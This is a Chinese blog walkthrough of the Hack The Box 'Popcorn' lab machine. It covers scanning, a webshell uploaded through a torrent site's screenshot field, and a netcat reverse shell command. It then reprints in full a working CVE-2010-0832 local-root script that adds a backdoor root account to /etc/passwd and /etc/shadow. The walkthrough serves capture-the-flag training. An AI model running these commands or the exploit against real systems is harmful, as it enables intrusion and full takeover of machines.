Hack The Box —— Popcorn


Hack The Box —— Popcorn

信息搜集

nmap

nmap -T4 -A -v 10.10.10.6

发现服务器开了 22 端口和 80 端口浏览器访问 http 服务,发现 只有 apache 的默认页面。

目录扫描

利用 dirsearch 工具扫描一波目录:

python3 dirsearch -u http://10.10.10.6 -e html

发现 test.php 页面和 torrent 目录,针对 torrent 目录进行目录扫描,发现 upload 上传目录可以访问,同时存在 index.php 页面。

功能点搜索

该网站为 bt 种子论坛站,注册用户,发现上传页面。

漏洞利用

在上传点尝试上传 webshell,发现失败,猜测程序检测上传的文件是否为标准的 bt 种子文件,且并未绕过过滤。
继续上传正常的 bt 种子文件,进行进一步测试:

发现在上传好的种子页面存在 screenshots 图标上传点,

尝试上传 webshell,发现成功上传。

访问 upload 目录,得到 webshell 的地址:

菜刀连接:

成功获取 user 的 flag。

同时在 home 目录下发现 .cache 文件夹,进入后发现 motd.legal-displayed 文件。

利用搜索引擎搜索相关文档,发现:
https://www.exploit-db.com/exploits/14339

利用虚拟终端反弹一个 shell 到本地,便于提权操作。

本机: nc -l 4444
受害机:nc -e /bin/bash 10.10.14.10 4444

利用菜刀上传 exp 脚本:

#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "[*] Ubuntu PAM MOTD local root"
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
backup() {
    [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
    [ -e "$1" ] || return 0
    mv "$1"{,.bak} || return 1
    echo "[*] Backuped $1"
}
restore() {
    [ -e "$1" ] && rm -rf "$1"
    [ -e "$1".bak ] || return 0
    mv "$1"{.bak,} || return 1
    echo "[*] Restored $1"
}
key_create() {
    backup ~/.ssh/authorized_keys
    ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
    [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
    mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
    echo "[*] SSH key set up"
}
key_remove() {
    rm -f "$KEY"
    restore ~/.ssh/authorized_keys
    echo "[*] SSH key removed"
}
own() {
    [ -e ~/.cache ] && rm -rf ~/.cache
    ln -s "$1" ~/.cache || return 1
    echo "[*] spawn ssh"
    ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
    [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
    echo "[+] owned: $1"
}
bye() {
    key_remove
    exit 1
}
KEY="$(mktemp -u)"
key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
key_remove
echo "[+] Success! Use password toor to get root"
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
  chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor

并给该脚本赋予执行权限:

chmod + x 1.sh

执行脚本,获得 root 权限:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Hack The Box —— Tenten Hack The Box —— Tenten
Hack The Box —— Tenten 信息搜集nmapnmap -T4 -A -v 10.10.10.6发现服务器开了 22 端口和 80 端口浏览器访问 http 服务,发现 wordpress 站点。 漏洞扫描利用 wpscan
2019-09-05
下一篇 
Hack The Box —— Devel Hack The Box —— Devel
Hack The Box —— Devel 信息搜集nmapnmap -T4 -A -v 10.10.10.5 发现服务器开了 21 端口和 80 端口,同时 ftp 服务可以匿名访问,但是不知道版本号。浏览器访问 http 服务,发现 只
2019-08-14
  目录